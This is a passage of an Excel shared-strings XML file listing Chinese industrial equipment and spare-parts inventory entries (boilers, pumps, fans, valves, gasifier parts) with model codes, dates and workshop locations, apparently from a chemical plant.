    <t>水汽车间  西厂区65T三废锅炉</t>
  </si>
  <si>
    <t>01968</t>
  </si>
  <si>
    <t>抓斗</t>
  </si>
  <si>
    <t>201-7.5立方</t>
  </si>
  <si>
    <t>2013.05.31</t>
  </si>
  <si>
    <t>水汽污水岗位</t>
  </si>
  <si>
    <t>01969</t>
  </si>
  <si>
    <t>造气炉入炉蒸汽自调系统</t>
  </si>
  <si>
    <t>DN250</t>
  </si>
  <si>
    <t>造气岗位(造气东南楼)</t>
  </si>
  <si>
    <t>01992</t>
  </si>
  <si>
    <t>BRO.1-5</t>
  </si>
  <si>
    <t>691风机岗位</t>
  </si>
  <si>
    <t>01993</t>
  </si>
  <si>
    <t>BRO.23-20</t>
  </si>
  <si>
    <t>02004</t>
  </si>
  <si>
    <t>3平方米</t>
  </si>
  <si>
    <t>2013.10.25</t>
  </si>
  <si>
    <t>02005</t>
  </si>
  <si>
    <t>水汽车间造气岗位东楼</t>
  </si>
  <si>
    <t>02017</t>
  </si>
  <si>
    <t>40YU-1A-20-25/4KW-2</t>
  </si>
  <si>
    <t>水汽车间  50吨锅炉岗位</t>
  </si>
  <si>
    <t>02024</t>
  </si>
  <si>
    <t>污水槽基础</t>
  </si>
  <si>
    <t>水汽车间 污水处理岗位</t>
  </si>
  <si>
    <t>02040</t>
  </si>
  <si>
    <t>三叶罗茨鼓风机</t>
  </si>
  <si>
    <t>MFSR50</t>
  </si>
  <si>
    <t>水汽车间50T锅炉岗位</t>
  </si>
  <si>
    <t>02043</t>
  </si>
  <si>
    <t>全焊型板式换热器'40平方</t>
  </si>
  <si>
    <t>HBRO.2</t>
  </si>
  <si>
    <t>水汽车间北楼造气岗位</t>
  </si>
  <si>
    <t>02046</t>
  </si>
  <si>
    <t>浮动搅拌液下泵</t>
  </si>
  <si>
    <t>25YUF-J-10.4-14-1.2</t>
  </si>
  <si>
    <t>水汽车间65T锅炉岗位</t>
  </si>
  <si>
    <t>02057</t>
  </si>
  <si>
    <t>烟气在线监测系统</t>
  </si>
  <si>
    <t>TLG-3000</t>
  </si>
  <si>
    <t>东20T锅炉</t>
  </si>
  <si>
    <t>02059</t>
  </si>
  <si>
    <t>西20T锅炉岗位</t>
  </si>
  <si>
    <t>02066</t>
  </si>
  <si>
    <t>减速机总成</t>
  </si>
  <si>
    <t>脱硫岗位</t>
  </si>
  <si>
    <t>02072</t>
  </si>
  <si>
    <t>在线自动监控数据采集传输仪及软件</t>
  </si>
  <si>
    <t>KSJK-803  LDKX-DGTEM</t>
  </si>
  <si>
    <t>2015.12.31</t>
  </si>
  <si>
    <t>西20T锅炉</t>
  </si>
  <si>
    <t>造气东南楼</t>
  </si>
  <si>
    <t>蒸汽递减装置</t>
  </si>
  <si>
    <t>加煤机控制器</t>
  </si>
  <si>
    <t>CJ/KZJ03-01</t>
  </si>
  <si>
    <t>一氧化碳报警器</t>
  </si>
  <si>
    <t>吊煤斗</t>
  </si>
  <si>
    <t>1.5*1.5*2</t>
  </si>
  <si>
    <t>炉条机</t>
  </si>
  <si>
    <t>JZ350-1</t>
  </si>
  <si>
    <t>自动加煤机布料器</t>
  </si>
  <si>
    <t>东南楼与东连接平台</t>
  </si>
  <si>
    <t>1.2*30</t>
  </si>
  <si>
    <t>废变速箱</t>
  </si>
  <si>
    <t>泵站系统</t>
  </si>
  <si>
    <t>油泵两台CBY3.100-1F,阀站5个，蓄能器6个</t>
  </si>
  <si>
    <t>水封</t>
  </si>
  <si>
    <t>2.5*2.5*3</t>
  </si>
  <si>
    <t>小气包</t>
  </si>
  <si>
    <t>2.5*2.5*4</t>
  </si>
  <si>
    <t>1000HB-ZK-A-80-115</t>
  </si>
  <si>
    <t>造气东楼</t>
  </si>
  <si>
    <t>转流式通风机</t>
  </si>
  <si>
    <t>SFG6-4</t>
  </si>
  <si>
    <t>小蒸汽分离器</t>
  </si>
  <si>
    <t>1.5*1.5*3</t>
  </si>
  <si>
    <t>2*2*3</t>
  </si>
  <si>
    <t>真空罐</t>
  </si>
  <si>
    <t>1*1*2.5</t>
  </si>
  <si>
    <t>Q61T/1T</t>
  </si>
  <si>
    <t>蒸汽缓冲器</t>
  </si>
  <si>
    <t>2*2*4</t>
  </si>
  <si>
    <t>2.8*2.8*15</t>
  </si>
  <si>
    <t>煤气柜</t>
  </si>
  <si>
    <r>
      <t>10000m</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>3</t>
    </r>
  </si>
  <si>
    <t>锅炉工段（东20吨）</t>
  </si>
  <si>
    <t>叶轮备件</t>
  </si>
  <si>
    <t>Y4-73-11D</t>
  </si>
  <si>
    <t>链条（废）</t>
  </si>
  <si>
    <t>LDSZ-400B</t>
  </si>
  <si>
    <t>风机进口备件</t>
  </si>
  <si>
    <t>4GC8*8</t>
  </si>
  <si>
    <t>2/GC3.5*8</t>
  </si>
  <si>
    <t>1S100-65-200</t>
  </si>
  <si>
    <t>1S100-40-200</t>
  </si>
  <si>
    <t>离心通风机</t>
  </si>
  <si>
    <t>SG20-1</t>
  </si>
  <si>
    <t>储水罐</t>
  </si>
  <si>
    <t>3.8*3.8*6</t>
  </si>
  <si>
    <t>Z41-H-40</t>
  </si>
  <si>
    <t>砂浆泵及备件</t>
  </si>
  <si>
    <t>100WHB-ZK-A-80</t>
  </si>
  <si>
    <t>炉排</t>
  </si>
  <si>
    <t>R9-26-11N</t>
  </si>
  <si>
    <t>1.5*1.5*4</t>
  </si>
  <si>
    <t>热力除氧</t>
  </si>
  <si>
    <t>抓泥机</t>
  </si>
  <si>
    <t>LD-Z</t>
  </si>
  <si>
    <t>3T电动葫芦2个，抓斗1个</t>
  </si>
  <si>
    <t>输煤机</t>
  </si>
  <si>
    <t>50T三废锅炉</t>
  </si>
  <si>
    <t>螺旋体备件</t>
  </si>
  <si>
    <t>烟气脱硫装置</t>
  </si>
  <si>
    <t>烟气在线分析</t>
  </si>
  <si>
    <t>KQSN100/200/2T</t>
  </si>
  <si>
    <t>10-300/5</t>
  </si>
  <si>
    <t>上煤斗</t>
  </si>
  <si>
    <t>造气炉中心定位</t>
  </si>
  <si>
    <t>2.8*2.8</t>
  </si>
  <si>
    <t>ZQ400</t>
  </si>
  <si>
    <t>造汽南楼</t>
  </si>
  <si>
    <t>2T</t>
  </si>
  <si>
    <t>手动葫芦</t>
  </si>
  <si>
    <t>储水槽</t>
  </si>
  <si>
    <t>除尘器</t>
  </si>
  <si>
    <t>2*2*6</t>
  </si>
  <si>
    <t>1*1*3</t>
  </si>
  <si>
    <t>烟道水封</t>
  </si>
  <si>
    <t>1.4*1.4*2</t>
  </si>
  <si>
    <t>2.4*2.4*15</t>
  </si>
  <si>
    <t>南北楼大洗气塔及水封</t>
  </si>
  <si>
    <t>3.3*3.3*17</t>
  </si>
  <si>
    <t>造汽北楼</t>
  </si>
  <si>
    <t>北楼洗气塔</t>
  </si>
  <si>
    <t>造气炉</t>
  </si>
  <si>
    <t>油压系统</t>
  </si>
  <si>
    <t>油泵CB-502台，阀站4个，蓄能器5个</t>
  </si>
  <si>
    <t>大气包</t>
  </si>
  <si>
    <t>气体分离器</t>
  </si>
  <si>
    <t>1*1*2</t>
  </si>
  <si>
    <t>JZQ350-1</t>
  </si>
  <si>
    <t>除尘</t>
  </si>
  <si>
    <t>2*2*2.5</t>
  </si>
  <si>
    <t>煤气管道</t>
  </si>
  <si>
    <t>炉条机备件</t>
  </si>
  <si>
    <t>蝶阀</t>
  </si>
  <si>
    <t>接力鼓风机</t>
  </si>
  <si>
    <t>G4-73-N10D</t>
  </si>
  <si>
    <t>锅炉工段（西20吨）</t>
  </si>
  <si>
    <t>鼓风机</t>
  </si>
  <si>
    <t>二次风机</t>
  </si>
  <si>
    <t>KG-26-11NOSD</t>
  </si>
  <si>
    <t>BSZ-400B</t>
  </si>
  <si>
    <t>马丁除渣机</t>
  </si>
  <si>
    <t>MC-4</t>
  </si>
  <si>
    <t>变速箱</t>
  </si>
  <si>
    <t>JZQ-250</t>
  </si>
  <si>
    <t>蒸汽过热器</t>
  </si>
  <si>
    <t>第二空气预热器</t>
  </si>
  <si>
    <t>不锈钢芯</t>
  </si>
  <si>
    <t>水封槽</t>
  </si>
  <si>
    <t>1.6*1.6*2.4</t>
  </si>
  <si>
    <t>水管锅炉</t>
  </si>
  <si>
    <t>热管锅炉</t>
  </si>
  <si>
    <t>9-19N12.5D右</t>
  </si>
  <si>
    <t>Y4-7316D右</t>
  </si>
  <si>
    <t>烟囱</t>
  </si>
  <si>
    <t>铁2*2*12</t>
  </si>
  <si>
    <t>南楼2套，北楼2套</t>
  </si>
  <si>
    <t>抓斗及轨道</t>
  </si>
  <si>
    <r>
      <t>40米/0.75m</t>
    </r>
    <r>
      <rPr>
        <vertAlign val="superscript"/>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>3</t>
    </r>
  </si>
  <si>
    <t>行车</t>
  </si>
  <si>
    <t>100UH-ZK-A-80-15</t>
  </si>
  <si>
    <t>煤场</t>
  </si>
  <si>
    <t>造气炉灰仓</t>
  </si>
  <si>
    <t>储气罐</t>
  </si>
  <si>
    <t>2.5*2.5*6</t>
  </si>
  <si>
    <t>蛟龙</t>
  </si>
  <si>
    <t>铁管300米</t>
  </si>
  <si>
    <t>罗茨风机</t>
  </si>
  <si>
    <t>ARH-700G</t>
  </si>
  <si>
    <t>油泵</t>
  </si>
  <si>
    <t>CB50</t>
  </si>
  <si>
    <t>2.6*2.6*15</t>
  </si>
  <si>
    <t>4*4*5</t>
  </si>
  <si>
    <t>XID75-8</t>
  </si>
  <si>
    <t>65UHB-2K-15-40</t>
  </si>
  <si>
    <t>制液泵</t>
  </si>
  <si>
    <t>50HB-ZK-A-20-20</t>
  </si>
  <si>
    <t>1.2*1.2*3</t>
  </si>
  <si>
    <t>1.2*1.2*4</t>
  </si>
  <si>
    <t>LG70*83WD-2</t>
  </si>
  <si>
    <t>引风机叶轮</t>
  </si>
  <si>
    <t>JJY130-11.2A-21.8D</t>
  </si>
  <si>
    <t>富液槽</t>
  </si>
  <si>
    <t>8*8*5</t>
  </si>
  <si>
    <t>4.5*4.5*4</t>
  </si>
  <si>
    <t>3.6*3.6*17</t>
  </si>
  <si>
    <t>电除尘进口水封</t>
  </si>
  <si>
    <t>1.6*1.6*11</t>
  </si>
  <si>
    <t>2*2*12.8</t>
  </si>
  <si>
    <t>脱硫泵</t>
  </si>
  <si>
    <t>KQSN-200-M12-228</t>
  </si>
  <si>
    <t>KQSN-350-M9-433</t>
  </si>
  <si>
    <t>300S-19</t>
  </si>
  <si>
    <t>冷水泵</t>
  </si>
  <si>
    <t>12SH-13</t>
  </si>
  <si>
    <t>65吨锅炉</t>
  </si>
  <si>
    <t>链条</t>
  </si>
  <si>
    <t>排</t>
  </si>
  <si>
    <t>DN700座板阀</t>
  </si>
  <si>
    <t>带油钢</t>
  </si>
  <si>
    <t>DN250座板阀</t>
  </si>
  <si>
    <t>DN250插板阀</t>
  </si>
  <si>
    <t>DN700碟阀</t>
  </si>
  <si>
    <t>DN700手动碟阀</t>
  </si>
  <si>
    <t>DN250碟阀</t>
  </si>
  <si>
    <t>DN100截止阀</t>
  </si>
  <si>
    <t>DN65P10截止阀</t>
  </si>
  <si>
    <t>DN200插板阀</t>
  </si>
  <si>
    <t>DN200手动插板阀</t>
  </si>
  <si>
    <t>DN600座板阀</t>
  </si>
  <si>
    <t>DN600插板阀</t>
  </si>
  <si>
    <t>DN600手动蝶阀</t>
  </si>
  <si>
    <t>00901</t>
  </si>
  <si>
    <t>搅拌机(双轴)</t>
  </si>
  <si>
    <t>SB3</t>
  </si>
  <si>
    <t>原料型煤</t>
  </si>
  <si>
    <t>00902</t>
  </si>
  <si>
    <t>胶带输送机</t>
  </si>
  <si>
    <t>B=800  12米</t>
  </si>
  <si>
    <t>原料 东北煤场</t>
  </si>
  <si>
    <t>00928</t>
  </si>
  <si>
    <t>01108</t>
  </si>
  <si>
    <t>搅拌减速机</t>
  </si>
  <si>
    <t>WHC201-1</t>
  </si>
  <si>
    <t>2006.11.20</t>
  </si>
  <si>
    <t>01187</t>
  </si>
  <si>
    <t>弹性振动筛</t>
  </si>
  <si>
    <t>YTG1020</t>
  </si>
  <si>
    <t>2007.02.25</t>
  </si>
  <si>
    <t>原料煤场</t>
  </si>
  <si>
    <t>01452</t>
  </si>
  <si>
    <t>弹性振杆筛</t>
  </si>
  <si>
    <t>YTG1230</t>
  </si>
  <si>
    <t>01949</t>
  </si>
  <si>
    <t>环锤式破碎机</t>
  </si>
  <si>
    <t>原料车间</t>
  </si>
  <si>
    <t>01957</t>
  </si>
  <si>
    <t>可逆锤式破碎机</t>
  </si>
  <si>
    <t>PCKF0908</t>
  </si>
  <si>
    <t>02016</t>
  </si>
  <si>
    <t>原料车间粉碎机电机</t>
  </si>
  <si>
    <t>55KW</t>
  </si>
  <si>
    <t>存货编码</t>
  </si>
  <si>
    <t>存货代码</t>
  </si>
  <si>
    <t>存货名称</t>
  </si>
  <si>
    <t>存货规格</t>
  </si>
  <si>
    <t>01010101-5</t>
  </si>
  <si>
    <t>单极泵</t>
  </si>
  <si>
    <t>125</t>
  </si>
  <si>
    <t>01010102-6</t>
  </si>
  <si>
    <t>转子总成</t>
  </si>
  <si>
    <t>KQSN300-M19-285</t>
  </si>
  <si>
    <t>01010106</t>
  </si>
  <si>
    <t>叶轮</t>
  </si>
  <si>
    <t>素</t>
  </si>
  <si>
    <t>01010108</t>
  </si>
  <si>
    <t>HD</t>
  </si>
  <si>
    <t>瓦合</t>
  </si>
  <si>
    <t>1507-1516</t>
  </si>
  <si>
    <t>01010110</t>
  </si>
  <si>
    <t>J6-18</t>
  </si>
  <si>
    <t>键</t>
  </si>
  <si>
    <t>0-50</t>
  </si>
  <si>
    <t>01010112</t>
  </si>
  <si>
    <t>TXD</t>
  </si>
  <si>
    <t>弹性垫</t>
  </si>
  <si>
    <t>M12-M20</t>
  </si>
  <si>
    <t>01010113</t>
  </si>
  <si>
    <t>WH</t>
  </si>
  <si>
    <t>汽</t>
  </si>
  <si>
    <t>01010115</t>
  </si>
  <si>
    <t>联轴器花键套</t>
  </si>
  <si>
    <t>01010117</t>
  </si>
  <si>
    <t>FT</t>
  </si>
  <si>
    <t>锁母</t>
  </si>
  <si>
    <t>01010118</t>
  </si>
  <si>
    <t>LJD</t>
  </si>
  <si>
    <t>六角垫</t>
  </si>
  <si>
    <t>0-200</t>
  </si>
  <si>
    <t>01010118-2</t>
  </si>
  <si>
    <t>70</t>
  </si>
  <si>
    <t>01010118-9</t>
  </si>
  <si>
    <t>110</t>
  </si>
  <si>
    <t>01010119</t>
  </si>
  <si>
    <t>ZX</t>
  </si>
  <si>
    <t>柱销螺丝</t>
  </si>
  <si>
    <t>8-16</t>
  </si>
  <si>
    <t>01010120</t>
  </si>
  <si>
    <t>叶轮锁母</t>
  </si>
  <si>
    <t>01010121</t>
  </si>
  <si>
    <t>YF</t>
  </si>
  <si>
    <t>油封</t>
  </si>
  <si>
    <t>01010122</t>
  </si>
  <si>
    <t>叶轮键</t>
  </si>
  <si>
    <t>化</t>
  </si>
  <si>
    <t>01010123</t>
  </si>
  <si>
    <t>机封</t>
  </si>
  <si>
    <t>化 125/160A</t>
  </si>
  <si>
    <t>01010125</t>
  </si>
  <si>
    <t>01010131</t>
  </si>
  <si>
    <t>YL</t>
  </si>
  <si>
    <t>M20-M40</t>
  </si>
  <si>
    <t>01010135</t>
  </si>
  <si>
    <t>NLZT</t>
  </si>
  <si>
    <t>01010137</t>
  </si>
  <si>
    <t>100-150</t>
  </si>
  <si>
    <t>01011202-1</t>
  </si>
  <si>
    <t>柱塞</t>
  </si>
  <si>
    <t>01020201</t>
  </si>
  <si>
    <t>ZCH2dz5.5</t>
  </si>
  <si>
    <t>支承环</t>
  </si>
  <si>
    <t>2DZ5.5</t>
  </si>
  <si>
    <t>01020202</t>
  </si>
  <si>
    <t>芯子</t>
  </si>
  <si>
    <t>01020203</t>
  </si>
  <si>
    <t>FZ</t>
  </si>
  <si>
    <t>阀组</t>
  </si>
  <si>
    <t>01020205</t>
  </si>
  <si>
    <t>MFH</t>
  </si>
  <si>
    <t>密封环</t>
  </si>
  <si>
    <t>01020208</t>
  </si>
  <si>
    <t>JLH</t>
  </si>
  <si>
    <t>节流环</t>
  </si>
  <si>
    <t>01020209</t>
  </si>
  <si>
    <t>ZLH</t>
  </si>
  <si>
    <t>阻流环</t>
  </si>
  <si>
    <t>01020215</t>
  </si>
  <si>
    <t>轴瓦</t>
  </si>
  <si>
    <t>01020216</t>
  </si>
  <si>
    <t>ZW</t>
  </si>
  <si>
    <t>连杆瓦</t>
  </si>
  <si>
    <t>2.DZ5.5</t>
  </si>
  <si>
    <t>副</t>
  </si>
  <si>
    <t>01020243</t>
  </si>
  <si>
    <t>LGS</t>
  </si>
  <si>
    <t>连杆栓</t>
  </si>
  <si>
    <t>01020244</t>
  </si>
  <si>
    <t>DS</t>
  </si>
  <si>
    <t>顶丝</t>
  </si>
  <si>
    <t>01030302</t>
  </si>
  <si>
    <t>ZCZA</t>
  </si>
  <si>
    <t>01030303</t>
  </si>
  <si>
    <t>HYZ</t>
  </si>
  <si>
    <t>横梁</t>
  </si>
  <si>
    <t>01030310</t>
  </si>
  <si>
    <t>搅拌侧盖</t>
  </si>
  <si>
    <t>01030320</t>
  </si>
  <si>
    <t>筛网</t>
  </si>
  <si>
    <t>01030324</t>
  </si>
  <si>
    <t>SZwf15</t>
  </si>
  <si>
    <t>筛子</t>
  </si>
  <si>
    <t>wf15</t>
  </si>
  <si>
    <t>01030325</t>
  </si>
  <si>
    <t>CZ</t>
  </si>
  <si>
    <t>锤轴</t>
  </si>
  <si>
    <t>01030326</t>
  </si>
  <si>
    <t>CTwf15</t>
  </si>
  <si>
    <t>锤头</t>
  </si>
  <si>
    <t>0908</t>
  </si>
  <si>
    <t>01030345</t>
  </si>
  <si>
    <t>LT</t>
  </si>
  <si>
    <t>链条接头</t>
  </si>
  <si>
    <t>01030361</t>
  </si>
  <si>
    <t>TG</t>
  </si>
  <si>
    <t>托辊</t>
  </si>
  <si>
    <t>89</t>
  </si>
  <si>
    <t>01030367</t>
  </si>
  <si>
    <t>挡辊</t>
  </si>
  <si>
    <t>60</t>
  </si>
  <si>
    <t>01030368</t>
  </si>
  <si>
    <t>01030369</t>
  </si>
  <si>
    <t>托辊组</t>
  </si>
  <si>
    <t>B650</t>
  </si>
  <si>
    <t>01030381-1</t>
  </si>
  <si>
    <t>热网轴</t>
  </si>
  <si>
    <t>01030381-2</t>
  </si>
  <si>
    <t>冷网轴</t>
  </si>
  <si>
    <t>1.44</t>
  </si>
  <si>
    <t>01030384</t>
  </si>
  <si>
    <t>XZL120*24</t>
  </si>
  <si>
    <t>行走轮</t>
  </si>
  <si>
    <t>120*24</t>
  </si>
  <si>
    <t>01030387</t>
  </si>
  <si>
    <t>LB</t>
  </si>
  <si>
    <t>挡板</t>
  </si>
  <si>
    <t>01030395</t>
  </si>
  <si>
    <t>炉排拉臂</t>
  </si>
  <si>
    <t>01040401</t>
  </si>
  <si>
    <t>BSXT</t>
  </si>
  <si>
    <t>垫片</t>
  </si>
  <si>
    <t>14</t>
  </si>
  <si>
    <t>01040402</t>
  </si>
  <si>
    <t>JSJK</t>
  </si>
  <si>
    <t>串顶</t>
  </si>
  <si>
    <t>2-3-5</t>
  </si>
  <si>
    <t>01040403</t>
  </si>
  <si>
    <t>DJ</t>
  </si>
  <si>
    <t>变速箱体</t>
  </si>
  <si>
    <t>01040407</t>
  </si>
  <si>
    <t>JSJZ</t>
  </si>
  <si>
    <t>减速机轴</t>
  </si>
  <si>
    <t>01040411</t>
  </si>
  <si>
    <t>HJZ2T</t>
  </si>
  <si>
    <t>花键轴</t>
  </si>
  <si>
    <t>01040412</t>
  </si>
  <si>
    <t>HJT2T</t>
  </si>
  <si>
    <t>花键套</t>
  </si>
  <si>
    <t>01040413</t>
  </si>
  <si>
    <t>LZQ2T</t>
  </si>
  <si>
    <t>联轴器</t>
  </si>
  <si>
    <t>01040417</t>
  </si>
  <si>
    <t>DHLGT2T</t>
  </si>
  <si>
    <t>电葫芦滚筒</t>
  </si>
  <si>
    <t>01040419</t>
  </si>
  <si>
    <t>吊钩</t>
  </si>
  <si>
    <t>01040431</t>
  </si>
  <si>
    <t>HJZ3T</t>
  </si>
  <si>
    <t>01040432</t>
  </si>
  <si>
    <t>HJT3T</t>
  </si>
  <si>
    <t>01040433</t>
  </si>
  <si>
    <t>LZQ3T</t>
  </si>
  <si>
    <t>01040434</t>
  </si>
  <si>
    <t>HJXCL3T</t>
  </si>
  <si>
    <t>花键小齿轮</t>
  </si>
  <si>
    <t>01040436</t>
  </si>
  <si>
    <t>XL3T</t>
  </si>
  <si>
    <t>行轮</t>
  </si>
  <si>
    <t>01040437</t>
  </si>
  <si>
    <t>DHLGT3T</t>
  </si>
  <si>
    <t>01040438</t>
  </si>
  <si>
    <t>GTWK3T</t>
  </si>
  <si>
    <t>筒外壳</t>
  </si>
  <si>
    <t>01040439</t>
  </si>
  <si>
    <t>BSX3T</t>
  </si>
  <si>
    <t>运行变速箱</t>
  </si>
  <si>
    <t>01040441</t>
  </si>
  <si>
    <t>DG3T</t>
  </si>
  <si>
    <t>01040451</t>
  </si>
  <si>
    <t>01040452</t>
  </si>
  <si>
    <t>HJT</t>
  </si>
  <si>
    <t>01040453</t>
  </si>
  <si>
    <t>01040456</t>
  </si>
  <si>
    <t>XL5T</t>
  </si>
  <si>
    <t>01040457</t>
  </si>
  <si>
    <t>DHLGT5T</t>
  </si>
  <si>
    <t>01040458</t>
  </si>
  <si>
    <t>GTWK5T</t>
  </si>
  <si>
    <t>滚筒外壳</t>
  </si>
  <si>
    <t>01040459</t>
  </si>
  <si>
    <t>BSX5T</t>
  </si>
  <si>
    <t>升降变速箱</t>
  </si>
  <si>
    <t>01040461</t>
  </si>
  <si>
    <t>01040473</t>
  </si>
  <si>
    <t>01040481</t>
  </si>
  <si>
    <t>捣绳器</t>
  </si>
  <si>
    <t>01040483</t>
  </si>
  <si>
    <t>箱体</t>
  </si>
  <si>
    <t>01050502</t>
  </si>
  <si>
    <t>WG</t>
  </si>
  <si>
    <t>蜗杆</t>
  </si>
  <si>
    <t>三型闭适传动</t>
  </si>
  <si>
    <t>01050503</t>
  </si>
  <si>
    <t>YG</t>
  </si>
  <si>
    <t>前、后压盖</t>
  </si>
  <si>
    <t>01050508-1</t>
  </si>
  <si>
    <t>前轴承盒</t>
  </si>
  <si>
    <t>01050513</t>
  </si>
  <si>
    <t>SXB</t>
  </si>
  <si>
    <t>扇形臂</t>
  </si>
  <si>
    <t>01050518</t>
  </si>
  <si>
    <t>TPTT</t>
  </si>
  <si>
    <t>小铁皮套</t>
  </si>
  <si>
    <t>01050522</t>
  </si>
  <si>
    <t>铁皮套</t>
  </si>
  <si>
    <t>01050523-1</t>
  </si>
  <si>
    <t>上盖</t>
  </si>
  <si>
    <t>01050525</t>
  </si>
  <si>
    <t>XHZ</t>
  </si>
  <si>
    <t>下灰轴</t>
  </si>
  <si>
    <t>01050526</t>
  </si>
  <si>
    <t>MFQ</t>
  </si>
  <si>
    <t>密封圈</t>
  </si>
  <si>
    <t>01050527</t>
  </si>
  <si>
    <t>DQ</t>
  </si>
  <si>
    <t>垫圈</t>
  </si>
  <si>
    <t>01050530</t>
  </si>
  <si>
    <t>小链轮</t>
  </si>
  <si>
    <t>01050531</t>
  </si>
  <si>
    <t>LTⅡ型</t>
  </si>
  <si>
    <t>01050534</t>
  </si>
  <si>
    <t>TP</t>
  </si>
  <si>
    <t>托盘</t>
  </si>
  <si>
    <t>01050537</t>
  </si>
  <si>
    <t>LD</t>
  </si>
  <si>
    <t>盒子</t>
  </si>
  <si>
    <t>01050550</t>
  </si>
  <si>
    <t>大链轮</t>
  </si>
  <si>
    <t>01050551</t>
  </si>
  <si>
    <t>轴承座</t>
  </si>
  <si>
    <t>1615T</t>
  </si>
  <si>
    <t>01050552</t>
  </si>
  <si>
    <t>01050557</t>
  </si>
  <si>
    <t>大轮轴</t>
  </si>
  <si>
    <t>TH400</t>
  </si>
  <si>
    <t>01050563</t>
  </si>
  <si>
    <t>SCLL</t>
  </si>
  <si>
    <t>四齿链轮</t>
  </si>
  <si>
    <t>01050570</t>
  </si>
  <si>
    <t>油标盖</t>
  </si>
  <si>
    <t>01060601</t>
  </si>
  <si>
    <t>BZ</t>
  </si>
  <si>
    <t>泵轴</t>
  </si>
  <si>
    <t>01060603</t>
  </si>
  <si>
    <t>ZT</t>
  </si>
  <si>
    <t>轴套</t>
  </si>
  <si>
    <t>100r 化工循环水</t>
  </si>
  <si>
    <t>01060604</t>
  </si>
  <si>
    <t>100r  化工循环水</t>
  </si>
  <si>
    <t>01060605</t>
  </si>
  <si>
    <t>SM</t>
  </si>
  <si>
    <t>01060616</t>
  </si>
  <si>
    <t>FM125</t>
  </si>
  <si>
    <t>01060618</t>
  </si>
  <si>
    <t>01060620</t>
  </si>
  <si>
    <t>轴</t>
  </si>
  <si>
    <t>01060621</t>
  </si>
  <si>
    <t>NF80HFY</t>
  </si>
  <si>
    <t>01060623</t>
  </si>
  <si>
    <t>80HY-32FM  化工</t>
  </si>
  <si>
    <t>01060632</t>
  </si>
  <si>
    <t>Z65W</t>
  </si>
  <si>
    <t>65UHB</t>
  </si>
  <si>
    <t>01060633</t>
  </si>
  <si>
    <t>40W</t>
  </si>
  <si>
    <t>01060634</t>
  </si>
  <si>
    <t>50W</t>
  </si>
  <si>
    <t>01060635</t>
  </si>
  <si>
    <t>Z23FB</t>
  </si>
  <si>
    <t>23FB</t>
  </si>
  <si>
    <t>01060636</t>
  </si>
  <si>
    <t>YL23FB</t>
  </si>
  <si>
    <t>01060637</t>
  </si>
  <si>
    <t>01060638</t>
  </si>
  <si>
    <t>MFH23FB</t>
  </si>
  <si>
    <t>01060639</t>
  </si>
  <si>
    <t>TLH23FB</t>
  </si>
  <si>
    <t>填料环</t>
  </si>
  <si>
    <t>01060641</t>
  </si>
  <si>
    <t>SN103</t>
  </si>
  <si>
    <t>01060642</t>
  </si>
  <si>
    <t>ZDH</t>
  </si>
  <si>
    <t>制动环</t>
  </si>
  <si>
    <t>01060643</t>
  </si>
  <si>
    <t>压盖</t>
  </si>
  <si>
    <t>2GC</t>
  </si>
  <si>
    <t>01060644</t>
  </si>
  <si>
    <t>01060646</t>
  </si>
  <si>
    <t>108-55 化工循环水</t>
  </si>
  <si>
    <t>01060650</t>
  </si>
  <si>
    <t>PHGDG6-25*8</t>
  </si>
  <si>
    <t>12SH-9B</t>
  </si>
  <si>
    <t>01060652</t>
  </si>
  <si>
    <t>ZDG6-25*8</t>
  </si>
  <si>
    <t>108-35 化工循环水</t>
  </si>
  <si>
    <t>01060657</t>
  </si>
  <si>
    <t>01060662</t>
  </si>
  <si>
    <t>109-25 化工循环水</t>
  </si>
  <si>
    <t>01060663</t>
  </si>
  <si>
    <t>BG</t>
  </si>
  <si>
    <t>泵盖</t>
  </si>
  <si>
    <t>50UHB-20</t>
  </si>
  <si>
    <t>01060664</t>
  </si>
  <si>
    <t>PHTDG25-30*3</t>
  </si>
  <si>
    <t>平衡套</t>
  </si>
  <si>
    <t>DG25-30*3</t>
  </si>
  <si>
    <t>01060665</t>
  </si>
  <si>
    <t>KHDG25-30*3</t>
  </si>
  <si>
    <t>口环</t>
  </si>
  <si>
    <t>01060666</t>
  </si>
  <si>
    <t>YLDG25-30*3</t>
  </si>
  <si>
    <t>01060667</t>
  </si>
  <si>
    <t>DYDG25-30*3</t>
  </si>
  <si>
    <t>导叶</t>
  </si>
  <si>
    <t>01060668</t>
  </si>
  <si>
    <t>phh</t>
  </si>
  <si>
    <t>平衡环</t>
  </si>
  <si>
    <t>DG6-25*8</t>
  </si>
  <si>
    <t>01060669</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>平衡盘</t>
  </si>
  <si>
    <t>01060671</t>
  </si>
  <si>
    <t>01060677</t>
  </si>
  <si>
    <t>01060679</t>
  </si>
  <si>
    <t>01060680</t>
  </si>
  <si>
    <t>01060681</t>
  </si>
  <si>
    <t>01060683</t>
  </si>
  <si>
    <t>01060684</t>
  </si>
  <si>
    <t>01060685</t>
  </si>
  <si>
    <t>01060686</t>
  </si>
  <si>
    <t>01060698</t>
  </si>
  <si>
    <t>机械密封</t>
  </si>
  <si>
    <t>FM100-200GL</t>
  </si>
  <si>
    <t>01060703</t>
  </si>
  <si>
    <t>RZ</t>
  </si>
  <si>
    <t>IS80-160</t>
  </si>
  <si>
    <t>01060708</t>
  </si>
  <si>
    <t>Z80NL-12A</t>
  </si>
  <si>
    <t>IS80-160  化工</t>
  </si>
  <si>
    <t>01060709</t>
  </si>
  <si>
    <t>YL80NL-12A</t>
  </si>
  <si>
    <t>01060713</t>
  </si>
  <si>
    <t>32-125</t>
  </si>
  <si>
    <t>01060714</t>
  </si>
  <si>
    <t>01060719</t>
  </si>
  <si>
    <t>SM300S-19</t>
  </si>
  <si>
    <t>轴承压盖</t>
  </si>
  <si>
    <t>125-315</t>
  </si>
  <si>
    <t>对</t>
  </si>
  <si>
    <t>01060722</t>
  </si>
  <si>
    <t>进口轴承支架</t>
  </si>
  <si>
    <t>8*8  锅炉</t>
  </si>
  <si>
    <t>01060723</t>
  </si>
  <si>
    <t>LZQ12SH-13</t>
  </si>
  <si>
    <t>200【150】-315</t>
  </si>
  <si>
    <t>01060724</t>
  </si>
  <si>
    <t>YL12SH-13</t>
  </si>
  <si>
    <t>01060727</t>
  </si>
  <si>
    <t>200-315</t>
  </si>
